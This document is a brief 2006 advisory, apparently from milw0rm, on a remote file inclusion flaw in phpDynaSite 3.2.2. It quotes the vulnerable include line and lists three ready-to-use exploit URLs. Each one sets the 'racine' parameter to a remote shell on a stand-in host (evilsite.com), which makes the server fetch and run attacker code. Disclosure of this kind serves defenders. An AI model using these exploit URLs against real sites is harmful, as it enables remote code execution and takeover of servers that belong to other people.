phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

2006-11-05T00:00:00
ID SECURITYVULNS:DOC:14936
Type securityvulns
Reporter Securityvulns
Modified 2006-11-05T00:00:00

Description


                                                WwW.Deltahacking.NeT

  • dynasite3.2.2

  • Class = Remote File Inclusion ;

  • Download = http://jaist.dl.sourceforge.net:80/sourceforge/phpdynasite/dynasite3.2.2.tar.gz

  • Found by = Dr.Pantagon (rezayavari2006@yahoo.com)


  • Vulnerable Code

    include($racine."connection.php");

++++++++++++++++++++++++++++++++++++++++++++

  • Exploit:

    http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell? http://[target]/[path]/function_balise_url.php?racine=http://evilsite.com/shell? http://[target]/[path]/connection.php?racine=http://evilsite.com/shell?


Gr33tz: Dr.Torojan


milw0rm.com [2006-11-04]